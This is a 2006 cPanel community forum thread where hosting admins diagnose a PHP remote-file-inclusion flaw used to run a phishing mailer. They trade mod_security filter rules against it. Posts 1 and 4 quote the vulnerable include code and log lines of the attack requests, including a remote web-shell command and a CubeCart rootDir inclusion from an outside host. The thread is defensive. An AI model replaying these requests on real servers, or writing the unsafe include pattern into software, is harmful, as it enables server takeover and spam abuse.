The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Spammer - loading external php scripts

Discussion in 'General Discussion' started by jeroman8, Mar 13, 2006.

  1. jeroman8

    jeroman8 Well-Known Member

    Joined:
    Mar 14, 2003
    Messages:
    410
    Likes Received:
    0
    Trophy Points:
    16
    I have spammers using a php script on my server to load external php scripts and commands. He sends out phising spam.
    I have found the below lines in domlogs and the blog.php script below is a php mailer script.

    Is it an exploit in the local php script making this possible ?
    The only php in this file is:

    <?PHP
    $page=$_GET['page'];
    if (empty($page)) {
    $page = "start.inc";
    }
    include $page;
    ?>


    In Domlogs:

    GET
    /index2.php?page=http://geocities.com/singapore_bm/abouts.php?act=cmd&d=%2Fhome%2Fwoddo%2Fpublic_html%2Fsdagen%2F&cmd=find+.%2F+-perm+777+-type+d&cmd_txt=1&submit=Execute

    GET
    index2.php?act=cmd&d=%2Fhome%2Fwoddo%2Fpublic_html%2Fsdagen%2F&cmd=find+.%2F+-perm+777+-type+d&cmd_txt=1&submit=Execute

    POST
    index2.php?page=http://geocities.com/singapore_bm/blog.php?


    I have hostmerit mod_sec rules and also blocked geocities now along with
    cmd_txt and perm+777. But I don't know if that stop it.
     
  2. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    Add this in my security ruleset to deal with those wankers, if it isn't already.

    SecFilter "act=cmd"
    SecFilter "page=http"
    SecFilter "geocities\.com"
     
  3. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    Also, the flaw is in that bit of PHP coding. It will more or less include anything 'fed' into it, parsing it as PHP on your server. Aka their spamming script, etc will run off your server. Also looks like they were looking for chmod 777 files, for a possible defacing attack. In addition to the rules, suspend the account and contact the user, as well as clearing your exim queue and restarting Apache, to clear old httpd spamming processes, and load the new rules.

    Hope that helps. ;)
     
  4. jeroman8

    jeroman8 Well-Known Member

    Joined:
    Mar 14, 2003
    Messages:
    410
    Likes Received:
    0
    Trophy Points:
    16
    Thanks!

    Do you have a rule for the current cubecart exploit ?
    I have been hit twice now and is doing the patches described in cubecart forum
    but I have a lot of cubecart clients so blocking it in mod_sec would be really great!

    /usr/local/apache/domlogs/xxxx.se:81.199.198.80 - - [30/Mar/2006:10:22:31 +0200] "GET /shop/includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob%5brootDir%5d=http://telo.to.md/blog2.txt? HTTP/1.1" 200 5109 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

    I can block the inlcuded url's but not much more since the include other urls
    is being used by clients in their blogs and forums etc.
    I have been thinking about blocking this option and they clients just have to be without it but many clients use us because the other hosts in swed en is really hard on security when it comes to php, disabling almost everything.

    I will try a few things myself and test it but don't know how it will affect other clients
    running other stuff.
    For example - block "rootDir", but that is maybe used in other scripts...
     
  5. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    I found these starting two days ago and personally used:

    #March 29
    SecFilter "orderSuccess\.inc\.php?" chain
    SecFilter "=http"

    SecFilter "[rootDir]=http"
    SecFilterSelective THE_REQUEST "rootDir"
    SecFilter "cart_order_id=1"


    Newest version of my mod_security config is at : http://www.hostmerit.com/modsec.user.conf

    Comments, etc, welcome.
     
    #5 HostMerit, Mar 30, 2006
    Last edited: Mar 30, 2006
  6. jeroman8

    jeroman8 Well-Known Member

    Joined:
    Mar 14, 2003
    Messages:
    410
    Likes Received:
    0
    Trophy Points:
    16
    Much appreciated - thank you !!!

    Been trying myself but since I do not know the rules/commands I was afraid blocking other stuff users might need.

    SecFilter "=http" - this looks like it should block other scripts "include" functions.
    For example a forum that load smiley from a image server etc.
    I guess it's enogh with SecFilterSelective THE_REQUEST "rootDir" if they must
    use that one to do it.
    I did not find any rootDir in domlogs except on the spammer site so it seems
    safe to have that rule.

    But I use all of them for now, clients may complain and then we take it from there.

    Thanks again!

    Regards Jerry
     
  7. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    If you'll notice that's a chain to the rule above it.

    SecFilter "orderSuccess\.inc\.php?" chain
    SecFilter "=http"

    So if it's orderSuccess.inc.php being called and includes =http, it will be blocked. (Hence a chained rule) :p
     
  8. jeroman8

    jeroman8 Well-Known Member

    Joined:
    Mar 14, 2003
    Messages:
    410
    Likes Received:
    0
    Trophy Points:
    16
    Hi!

    SecFilter "[rootDir]=http" - this is blocking a lot of post commands and many clients
    have trouble and errors.

    For example the regular "FormMail" in cgi-sys is down.
    OScommerce function with checkout etc is being blocked !!
    Banner program is down for including external banners.
    And many other things.
    I guess [rootDir]=http means more than just exactly that word or those characters.

    You clients must have noticed this ?
    I had to remove it and I hope the rest of the cubecart rules will be enough.
     
    #8 jeroman8, Apr 2, 2006
    Last edited: Apr 3, 2006
Loading...

Share This Page